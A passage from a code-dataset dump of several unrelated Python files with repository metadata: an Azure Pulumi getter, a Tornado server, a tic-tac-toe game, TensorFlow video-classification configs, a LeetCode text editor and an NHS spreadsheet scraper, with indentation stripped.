] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,319 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWebAppFunctionResult',
'AwaitableGetWebAppFunctionResult',
'get_web_app_function',
]
@pulumi.output_type
class GetWebAppFunctionResult:
"""
Web Job Information.
"""
def __init__(__self__, config=None, config_href=None, files=None, function_app_id=None, href=None, kind=None, name=None, script_href=None, script_root_path_href=None, secrets_file_href=None, test_data=None, type=None):
if config and not isinstance(config, dict):
raise TypeError("Expected argument 'config' to be a dict")
pulumi.set(__self__, "config", config)
if config_href and not isinstance(config_href, str):
raise TypeError("Expected argument 'config_href' to be a str")
pulumi.set(__self__, "config_href", config_href)
if files and not isinstance(files, dict):
raise TypeError("Expected argument 'files' to be a dict")
pulumi.set(__self__, "files", files)
if function_app_id and not isinstance(function_app_id, str):
raise TypeError("Expected argument 'function_app_id' to be a str")
pulumi.set(__self__, "function_app_id", function_app_id)
if href and not isinstance(href, str):
raise TypeError("Expected argument 'href' to be a str")
pulumi.set(__self__, "href", href)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if script_href and not isinstance(script_href, str):
raise TypeError("Expected argument 'script_href' to be a str")
pulumi.set(__self__, "script_href", script_href)
if script_root_path_href and not isinstance(script_root_path_href, str):
raise TypeError("Expected argument 'script_root_path_href' to be a str")
pulumi.set(__self__, "script_root_path_href", script_root_path_href)
if secrets_file_href and not isinstance(secrets_file_href, str):
raise TypeError("Expected argument 'secrets_file_href' to be a str")
pulumi.set(__self__, "secrets_file_href", secrets_file_href)
if test_data and not isinstance(test_data, str):
raise TypeError("Expected argument 'test_data' to be a str")
pulumi.set(__self__, "test_data", test_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def config(self) -> Optional[Mapping[str, Any]]:
"""
Config information.
"""
return pulumi.get(self, "config")
@property
@pulumi.getter(name="configHref")
def config_href(self) -> Optional[str]:
"""
Config URI.
"""
return pulumi.get(self, "config_href")
@property
@pulumi.getter
def files(self) -> Optional[Mapping[str, str]]:
"""
File list.
"""
return pulumi.get(self, "files")
@property
@pulumi.getter(name="functionAppId")
def function_app_id(self) -> Optional[str]:
"""
Function App ID.
"""
return pulumi.get(self, "function_app_id")
@property
@pulumi.getter
def href(self) -> Optional[str]:
"""
Function URI.
"""
return pulumi.get(self, "href")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="scriptHref")
def script_href(self) -> Optional[str]:
"""
Script URI.
"""
return pulumi.get(self, "script_href")
@property
@pulumi.getter(name="scriptRootPathHref")
def script_root_path_href(self) -> Optional[str]:
"""
Script root path URI.
"""
return pulumi.get(self, "script_root_path_href")
@property
@pulumi.getter(name="secretsFileHref")
def secrets_file_href(self) -> Optional[str]:
"""
Secrets file URI.
"""
return pulumi.get(self, "secrets_file_href")
@property
@pulumi.getter(name="testData")
def test_data(self) -> Optional[str]:
"""
Test data used when testing via the Azure Portal.
"""
return pulumi.get(self, "test_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppFunctionResult(GetWebAppFunctionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppFunctionResult(
config=self.config,
config_href=self.config_href,
files=self.files,
function_app_id=self.function_app_id,
href=self.href,
kind=self.kind,
name=self.name,
script_href=self.script_href,
script_root_path_href=self.script_root_path_href,
secrets_file_href=self.secrets_file_href,
test_data=self.test_data,
type=self.type)
def get_web_app_function(function_name: Optional[str] = None,
name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppFunctionResult:
"""
Use this data source to access information about an existing resource.
:param str function_name: Function name.
:param str name: Site name.
:param str resource_group_name: Name of the resource group to which the resource belongs.
"""
__args__ = dict()
__args__['functionName'] = function_name
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:web/v20181101:getWebAppFunction', __args__, opts=opts, typ=GetWebAppFunctionResult).value
return AwaitableGetWebAppFunctionResult(
config=__ret__.config,
config_href=__ret__.config_href,
files=__ret__.files,
function_app_id=__ret__.function_app_id,
href=__ret__.href,
kind=__ret__.kind,
name=__ret__.name,
script_href=__ret__.script_href,
script_root_path_href=__ret__.script_root_path_href,
secrets_file_href=__ret__.secrets_file_href,
test_data=__ret__.test_data,
type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
5fbbbba6af3dfcfca89cb54da6713158b0a6ecbd | 4e60e8a46354bef6e851e77d8df4964d35f5e53f | /main.py | ae35090fa53b38726ed25a70d0f2454551d2dee5 | [] | no_license | cq146637/DockerManagerPlatform | cbae4154ad66eac01772ddd902d7f70b62a2d856 | 9c509fb8dca6633ed3afdc92d4e6491b5d13e322 | refs/heads/master | 2021-04-09T13:58:14.117752 | 2018-03-19T13:41:04 | 2018-03-19T13:41:04 | 125,712,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # -*- coding: utf-8 -*-
__author__ = 'CQ'
import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from settings import settings
from url.urls import urls
from tornado.options import define, options, parse_command_line
define("port", default=8888, help="run on the given port", type=int)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
if __name__ == "__main__":
app = tornado.web.Application(
handlers=urls,
**settings,
)
parse_command_line()
print('The service is already running on port %s ...' % options.port)
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
| [
"1016025625@qq.com"
] | 1016025625@qq.com |
080f45148a5f23811232fe76aaf7c83e197d9bfb | e8eb2cecee1ebc47455917fa11a58e7b5a912b74 | /python_lessons/python_advanced_02_tic_tac_toe/app/model/game.py | c5b61a7de11ddc51661518c76607cd7bc169970c | [] | no_license | cyr1z/python_education | ad0f9e116536a5583a12e05efe41ee173639ea9c | 37b2edbccf6f96c59c14cabf4bf749a3ec0f503d | refs/heads/main | 2023-06-08T10:24:26.217582 | 2021-06-27T17:02:05 | 2021-06-27T17:02:05 | 359,467,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | """
Game module.
"""
from app.model.table import GameTable
from app.view.table_view import TableView
class Game:
"""
Game play class
"""
def __init__(self, numbers_map, player1, player2):
self.table = GameTable(numbers_map)
self.players = []
self.players.append(player1)
self.players.append(player2)
def play_step(self, player):
"""
play step for player
:param player: Player
:return:
"""
print(TableView(**self.table.choices))
number = player.get_choice(self.table)
return self.table.choice_handler(number, player)
def iteration(self) -> dict:
"""
running game step for player
:return: bool
"""
request = {}
for player in self.players:
request = self.play_step(player)
if request:
break
return request
| [
"cyr@zolotarev.pp.ua"
] | cyr@zolotarev.pp.ua |
1fcea8653789c9e4dfb17a9855b267d4c204b864 | a6d48cfa5e60ff635e7a6e87c49c5626b5cd9cc6 | /official/vision/beta/configs/video_classification.py | 06897d2a16c98f7b46533e193875fdd5e763a2a7 | [
"Apache-2.0"
] | permissive | jyshin0926/models | 4b0c107ca4170992e8a26370414a950413a59904 | 02574bc3dfbbf913c13937865e6609f4a0be3dc9 | refs/heads/master | 2023-03-28T09:12:50.138751 | 2021-03-23T00:53:09 | 2021-03-23T00:53:09 | 350,530,029 | 2 | 0 | Apache-2.0 | 2021-03-23T00:27:57 | 2021-03-23T00:27:57 | null | UTF-8 | Python | false | false | 8,565 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Video classification configuration definition."""
from typing import Optional, Tuple
import dataclasses
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import hyperparams
from official.modeling import optimization
from official.vision.beta.configs import backbones_3d
from official.vision.beta.configs import common
@dataclasses.dataclass
class DataConfig(cfg.DataConfig):
"""The base configuration for building datasets."""
name: Optional[str] = None
file_type: Optional[str] = 'tfrecord'
compressed_input: bool = False
split: str = 'train'
feature_shape: Tuple[int, ...] = (64, 224, 224, 3)
temporal_stride: int = 1
num_test_clips: int = 1
num_test_crops: int = 1
num_classes: int = -1
num_channels: int = 3
num_examples: int = -1
global_batch_size: int = 128
num_devices: int = 1
data_format: str = 'channels_last'
dtype: str = 'float32'
one_hot: bool = True
shuffle_buffer_size: int = 64
cache: bool = False
input_path: str = ''
is_training: bool = True
cycle_length: int = 10
drop_remainder: bool = True
min_image_size: int = 256
is_multilabel: bool = False
output_audio: bool = False
audio_feature: str = ''
audio_feature_shape: Tuple[int, ...] = (-1,)
aug_min_aspect_ratio: float = 0.5
aug_max_aspect_ratio: float = 2.0
aug_min_area_ratio: float = 0.49
aug_max_area_ratio: float = 1.0
def kinetics400(is_training):
"""Generated Kinectics 400 dataset configs."""
return DataConfig(
name='kinetics400',
num_classes=400,
is_training=is_training,
split='train' if is_training else 'valid',
drop_remainder=is_training,
num_examples=215570 if is_training else 17706,
feature_shape=(64, 224, 224, 3) if is_training else (250, 224, 224, 3))
def kinetics600(is_training):
"""Generated Kinectics 600 dataset configs."""
return DataConfig(
name='kinetics600',
num_classes=600,
is_training=is_training,
split='train' if is_training else 'valid',
drop_remainder=is_training,
num_examples=366016 if is_training else 27780,
feature_shape=(64, 224, 224, 3) if is_training else (250, 224, 224, 3))
@dataclasses.dataclass
class VideoClassificationModel(hyperparams.Config):
"""The model config."""
model_type: str = 'video_classification'
backbone: backbones_3d.Backbone3D = backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50())
norm_activation: common.NormActivation = common.NormActivation(
use_sync_bn=False)
dropout_rate: float = 0.2
aggregate_endpoints: bool = False
@dataclasses.dataclass
class Losses(hyperparams.Config):
one_hot: bool = True
label_smoothing: float = 0.0
l2_weight_decay: float = 0.0
@dataclasses.dataclass
class VideoClassificationTask(cfg.TaskConfig):
"""The task config."""
model: VideoClassificationModel = VideoClassificationModel()
train_data: DataConfig = DataConfig(is_training=True, drop_remainder=True)
validation_data: DataConfig = DataConfig(
is_training=False, drop_remainder=False)
losses: Losses = Losses()
def add_trainer(experiment: cfg.ExperimentConfig,
train_batch_size: int,
eval_batch_size: int,
learning_rate: float = 1.6,
train_epochs: int = 44,
warmup_epochs: int = 5):
"""Add and config a trainer to the experiment config."""
if experiment.task.train_data.num_examples <= 0:
raise ValueError('Wrong train dataset size {!r}'.format(
experiment.task.train_data))
if experiment.task.validation_data.num_examples <= 0:
raise ValueError('Wrong validation dataset size {!r}'.format(
experiment.task.validation_data))
experiment.task.train_data.global_batch_size = train_batch_size
experiment.task.validation_data.global_batch_size = eval_batch_size
steps_per_epoch = experiment.task.train_data.num_examples // train_batch_size
experiment.trainer = cfg.TrainerConfig(
steps_per_loop=steps_per_epoch,
summary_interval=steps_per_epoch,
checkpoint_interval=steps_per_epoch,
train_steps=train_epochs * steps_per_epoch,
validation_steps=experiment.task.validation_data.num_examples //
eval_batch_size,
validation_interval=steps_per_epoch,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'sgd',
'sgd': {
'momentum': 0.9,
'nesterov': True,
}
},
'learning_rate': {
'type': 'cosine',
'cosine': {
'initial_learning_rate': learning_rate,
'decay_steps': train_epochs * steps_per_epoch,
}
},
'warmup': {
'type': 'linear',
'linear': {
'warmup_steps': warmup_epochs * steps_per_epoch,
'warmup_learning_rate': 0
}
}
}))
return experiment
@exp_factory.register_config_factory('video_classification')
def video_classification() -> cfg.ExperimentConfig:
"""Video classification general."""
return cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=VideoClassificationTask(),
trainer=cfg.TrainerConfig(),
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
@exp_factory.register_config_factory('video_classification_kinetics400')
def video_classification_kinetics400() -> cfg.ExperimentConfig:
"""Video classification on Kinectics 400 with resnet."""
train_dataset = kinetics400(is_training=True)
validation_dataset = kinetics400(is_training=False)
task = VideoClassificationTask(
model=VideoClassificationModel(
backbone=backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50()),
norm_activation=common.NormActivation(
norm_momentum=0.9, norm_epsilon=1e-5, use_sync_bn=False)),
losses=Losses(l2_weight_decay=1e-4),
train_data=train_dataset,
validation_data=validation_dataset)
config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=task,
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
add_trainer(config, train_batch_size=1024, eval_batch_size=64)
return config
@exp_factory.register_config_factory('video_classification_kinetics600')
def video_classification_kinetics600() -> cfg.ExperimentConfig:
"""Video classification on Kinectics 600 with resnet."""
train_dataset = kinetics600(is_training=True)
validation_dataset = kinetics600(is_training=False)
task = VideoClassificationTask(
model=VideoClassificationModel(
backbone=backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50()),
norm_activation=common.NormActivation(
norm_momentum=0.9, norm_epsilon=1e-5, use_sync_bn=False)),
losses=Losses(l2_weight_decay=1e-4),
train_data=train_dataset,
validation_data=validation_dataset)
config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=task,
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
add_trainer(config, train_batch_size=1024, eval_batch_size=64)
return config
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
093b8ea7593c9c1b921e251e644de80e43c8a9f9 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/DesignaTextEditor.py | 3f9a03e8ddcfd31fcc7ef5243000df664c94c4e6 | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,725 | py | """
Design a text editor with a cursor that can do the following:
Add text to where the cursor is.
Delete text from where the cursor is (simulating the backspace key).
Move the cursor either left or right.
When deleting text, only characters to the left of the cursor will be deleted. The cursor will also remain within the actual text and cannot be moved beyond it. More formally, we have that 0 <= cursor.position <= currentText.length always holds.
Implement the TextEditor class:
TextEditor() Initializes the object with empty text.
void addText(string text) Appends text to where the cursor is. The cursor ends to the right of text.
int deleteText(int k) Deletes k characters to the left of the cursor. Returns the number of characters actually deleted.
string cursorLeft(int k) Moves the cursor to the left k times. Returns the last min(10, len) characters to the left of the cursor, where len is the number of characters to the left of the cursor.
string cursorRight(int k) Moves the cursor to the right k times. Returns the last min(10, len) characters to the left of the cursor, where len is the number of characters to the left of the cursor.
Example 1:
Input
["TextEditor", "addText", "deleteText", "addText", "cursorRight", "cursorLeft", "deleteText", "cursorLeft", "cursorRight"]
[[], ["leetcode"], [4], ["practice"], [3], [8], [10], [2], [6]]
Output
[null, null, 4, null, "etpractice", "leet", 4, "", "practi"]
Explanation
TextEditor textEditor = new TextEditor(); // The current text is "|". (The '|' character represents the cursor)
textEditor.addText("leetcode"); // The current text is "leetcode|".
textEditor.deleteText(4); // return 4
// The current text is "leet|".
// 4 characters were deleted.
textEditor.addText("practice"); // The current text is "leetpractice|".
textEditor.cursorRight(3); // return "etpractice"
// The current text is "leetpractice|".
// The cursor cannot be moved beyond the actual text and thus did not move.
// "etpractice" is the last 10 characters to the left of the cursor.
textEditor.cursorLeft(8); // return "leet"
// The current text is "leet|practice".
// "leet" is the last min(10, 4) = 4 characters to the left of the cursor.
textEditor.deleteText(10); // return 4
// The current text is "|practice".
// Only 4 characters were deleted.
textEditor.cursorLeft(2); // return ""
// The current text is "|practice".
// The cursor cannot be moved beyond the actual text and thus did not move.
// "" is the last min(10, 0) = 0 characters to the left of the cursor.
textEditor.cursorRight(6); // return "practi"
// The current text is "practi|ce".
// "practi" is the last min(10, 6) = 6 characters to the left of the cursor.
Constraints:
1 <= text.length, k <= 40
text consists of lowercase English letters.
At most 2 * 104 calls in total will be made to addText, deleteText, cursorLeft and cursorRight.
hint:
1 Making changes in the middle of some data structures is generally harder than changing the front/back of the same data structure.
2 Can you partition your data structure (text with cursor) into two parts, such that each part changes only near its ends?
3 Can you think of a data structure that supports efficient removals/additions to the front/back?
4 Try to solve the problem with two deques by maintaining the prefix and the suffix separately.
"""
class TextEditor:
def __init__(self):
self.s = ""
self.cursor = 0
def addText(self, text: str) -> None:
self.s = self.s[:self.cursor] + text + self.s[self.cursor:]
self.cursor += len(text)
def deleteText(self, k: int) -> int:
cur = max(0, self.cursor - k)
delete_cnt = k if self.cursor - k >= 0 else self.cursor
self.s = self.s[:cur] + self.s[self.cursor:]
self.cursor = cur
return delete_cnt
def cursorLeft(self, k: int) -> str:
self.cursor = max(0, self.cursor - k)
start = max(0, self.cursor - 10)
return self.s[start:self.cursor]
def cursorRight(self, k: int) -> str:
self.cursor = min(len(self.s), self.cursor + k)
start = max(0, self.cursor - 10)
return self.s[start:self.cursor]
# Your TextEditor object will be instantiated and called as such:
# obj = TextEditor()
# obj.addText(text)
# param_2 = obj.deleteText(k)
# param_3 = obj.cursorLeft(k)
# param_4 = obj.cursorRight(k) | [
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
610e9e0094ced115c64f5c06b9dbb9ab77bfc073 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/psychemedia/nhs_sit_reps_2011.py | e2234bd29ed70633306158127db3feacfd95e2e7 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,202 | py | #Scrape sit reports
#Reshape data from original format - dates are facet values, and as such row vals not column vals
#Dates are given in all manner of formats in the oroginal col headings; I've made a start on parsing them but there's still work to be done
#Need to build a table that contains scraped sheets so we don't scrape them again
#TO DO - I chose some really bad column names - to, from, table; need to change these really?
#import xlrd library - documentation at https://secure.simplistix.co.uk/svn/xlrd/trunk/xlrd/doc/xlrd.html
import xlrd
import md5
import time
from time import mktime
from datetime import datetime
import scraperwiki
import lxml.html
#UTILITY FUNCTION TO DROP TABLES
def dropper(table):
if table!='':
try: scraperwiki.sqlite.execute('drop table "'+table+'"')
except: pass
#---
#http://stackoverflow.com/a/1112664/454773
import datetime
def minimalist_xldate_as_datetime(xldate, datemode):
# datemode: 0 for 1900-based, 1 for 1904-based
return (
datetime.datetime(1899, 12, 30)
+ datetime.timedelta(days=xldate + 1462 * datemode)
)
#----
#Start of with a fudge - can we assume spreadsheets are templated, same each week?
def init():
templateURL='https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls'
xlbin = scraperwiki.scrape(templateURL)
#use the open_workbook function on that new variable to create another, 'book'
book = xlrd.open_workbook(file_contents=xlbin)
#Create a table that acts as a table directory
sheetnum=0
for sheetname in book.sheet_names():
sid='id_'+str(sheetnum)
data={'id':sid,'name':sheetname}
scraperwiki.sqlite.save(["id", "name"], data)
sheetnum=sheetnum+1
#init()
#exit(-1)
def tablePatch(bd):
bd2=[]
for r in bd:
if 'tid' not in r:
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
elif r['tid']=='':
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
return bd2
def maintenanceHack1():
tables=scraperwiki.sqlite.select("* from swdata")
fulltable=scraperwiki.sqlite.select("* from fulltable")
bigdata=[]
tid={}
for t in tables:
tid[t['name']]=t['id']
for r in fulltable:
if 'tid' not in r:
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
elif r['tid']=='':
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
#maintenanceHack1()
def init2():
tables=scraperwiki.sqlite.select("* from swdata")
for t in tables:
dropper(t['id'])
dropper('fulltable')
#dropper('swdata')
#exit(-1)
#init2()
#exit(-1)
try:
tables=scraperwiki.sqlite.select("* from swdata")
except:
tables=[]
print tables
tableLookup={}
for t in tables:
tableLookup[t['name']]=t['id']
scrapedAlready=[]
try:
scrapedtables=scraperwiki.sqlite.select("* from scraped")
for t in scrapedtables:
scrapedAlready.append(t['url'])
except: pass
def simplifiedKey(key):
key=key.replace('/','.')
#still got bad key? ???in Cancelled operations ???
#replaced to and still broken:
# 16 18.11.2012
return key
dateLookup={}
def dateNormalise(d):
#This is a bit of a hack - each time we find new date formats for the cols, we'll need to extend this
#For pattern matching strings, see http://www.tutorialspoint.com/python/time_strptime.htm
for trials in ["%d %b %y","%d %b%y",'%d-%b-%y','%d-%b-%Y','%d/%m/%Y','%d/%m/%y','%d %b %Y','%d-%m-%Y','%d/%m%Y']:
try:
d=d.strip()
dtf =datetime.datetime.fromtimestamp(mktime(time.strptime(d, trials)))
break
except:
dtf=d
if type(dtf) is datetime.datetime:
dtf=dtf.strftime("%Y-%m-%d")
return dtf
def patchDate(f,t):
tt=t.split('-')
ff=f.split('-')
f=int(ff[0])
#how to cope with month rollover
if int(tt[2])<int(f):
#so we have a month change
tt[1]=int(tt[1])-1
#There may ne an issue at year rollover but we have to see how that is represented...
if int(tt[1])==0:
print 'weekend rollover at year end - how have they represented the dates?'
tt[0]=int(tt[0])-1
tt[1]=12
#exit(-1)
fromdate='-'.join( [ str(tt[0]),str(tt[1]),str(f) ])
dtf=datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
if type(dtf) is datetime.datetime:
fromdate=dtf.strftime("%Y-%m-%d")
else:
print dtf
exit(-1)
return fromdate
def dateRangeParse(daterange):
#----
#HORRIBLE HACK to cope with 02/122012
#-->handle in the trials parse pattern
#=daterange.replace('122012','12/2012')
#----
dd=daterange.split(' to ')
if len(dd)<2:
dd2=daterange.split(' - ')
if len(dd2)<2:
fromdate=daterange
todate=daterange
else:
fromdate=dd2[0]
todate=dd2[1]
else:
fromdate=dd[0]
todate=dd[1]
todate=dateNormalise(todate)
#I think we'll require another fudge here, eg if date is given as '6 to 8 Nov 2012' we'll need to finesse '6' to '6 Nov 2012'
fromdate=dateNormalise(fromdate)
#if len(fromdate)<3:
try:
datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
except:
fromdate=patchDate(fromdate,todate)
return (fromdate,todate)
def scrapesheets3(XLS):
xlbin = scraperwiki.scrape(XLS)
book = xlrd.open_workbook(file_contents=xlbin)
print book.sheet_names()
for sheetname in book.sheet_names():
bigdata=[]
if sheetname in tableLookup:
tt=tableLookup[sheetname]
#If we want to clear the tables...
#dropper(tt)
else:
l=len(tableLookup)
sid='id_'+str(l)
tableLookup[sheetname]=sid
scraperwiki.sqlite.save(["id", "name"], {'id':sid,'name':sheetname} )
tt=tableLookup[sheetname]
#exit(-1) #crash out for now...
print 'Tablename:',tt
sheet = book.sheet_by_name(sheetname)
sheetwidth=len(sheet.row_values(17))
print sheetname,sheetwidth,sheet.nrows
keys={}
facetAkeys={}
tokeys={}
fromkeys={}
facetBkeys={}
for col in range(1,4):
keys[col]=sheet.row_values(14)[col]
lastfacetAkey=-1
if sheet.row_values(13)[5]!='' or sheet.row_values(13)[4]!='':
for col in range (4,sheetwidth):
if sheet.row_values(13)[col]!='':
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(13)[col],book.datemode).date().strftime("%Y-%m-%d")
except:
facetAkeys[col]=sheet.row_values(13)[col]
lastfacetAkey=facetAkeys[col]
else:
facetAkeys[col]=lastfacetAkey
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=sheet.row_values(14)[col]
else:
for col in range (4,sheetwidth):
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date().strftime("%Y-%m-%d")
#It may make more sense to save this as a proper date - in which case just drop the strftime bit
#facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date()
#As query in https://scraperwiki.com/views/ou_bbc_co-pro_on_iplayer_-_bootstrap/ shows, we can do time based SQLite queries?
#TO DO? Some of the facetAkeys are date ranges, so maybe bettwe to split as facetAkeysFrom and facetAkeysTo?
##If it's not a range, set from and to as the same.
except:
facetAkeys[col]=sheet.row_values(14)[col]
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=''
#print fromkeys
for row in range(17, sheet.nrows):
data={}
#hack fudge error trap
if sheet.row_values(row)[2]=='':continue
for col in range(1,4):
#these are typically ['SHA','Code','Name',]
data[keys[col]]=sheet.row_values(row)[col]
for col in range (4,sheetwidth):
#TO DO - change colhead to tableName
#data['table']=sheetname
data['tableName']=sheetname
data['facetA']=facetAkeys[col]
#TO DO - change colhead to fromDateStr
#data['from']=fromkeys[col]
data['fromDateStr']=fromkeys[col]
#TO DO - change colhead to toDateStr
#data['to']=tokeys[col]
data['toDateStr']=tokeys[col]
data['facetB']=facetBkeys[col]
data["value"]=sheet.row_values(row)[col]
data['id']=md5.new(''.join([ data['tableName'],data['Code'],data['fromDateStr'],data['facetB'] ])).hexdigest()
#scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=data)
#If we get properly unique keys - uniqid - eg as in hash idea above but also adding tt into hash mix, we can do a fulltable?
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=data,verbose = 0)
#If data variable persists, the pass by reference append of the data dict breaks bigdata; so force append by value instead
bigdata.append(data.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
#Tidy up by saving any data that's left outstanding
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['url'],table_name='scraped', data={'url':XLS})
#TESTING
#scrapesheets2('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#scrapesheets3('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#From a scraper by paulbradshaw
#define our URL - this links to all the spreadsheets
#URL = 'http://transparency.dh.gov.uk/2012/10/26/winter-pressures-daily-situation-reports-2012-13/'
URL='http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm'
#HTML to grab is:
#<p><strong>November 2012</strong><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls">DailySR – week ending 18 Nov 12.xls (492KB).</a><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls">DailySR – 6 Nov 12 to 11 Nov 12.xls (446KB)</a>.</p>
#HTML to avoid that generates an error is:
#<p>Data for this collection is available back to November 2010.<br />
#For previous years’ data <a #href="http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm">click here</a>.</p>
#Create a new function which takes one parameter and names it 'URL'
def grabexcellinks(URL):
#Use Scraperwiki's scrape function on 'URL', put results in new variable 'html'
html = scraperwiki.scrape(URL)
#and show it us
print html
#Use lxml.html's fromstring function on 'html', put results in new variable 'root'
root = lxml.html.fromstring(html)
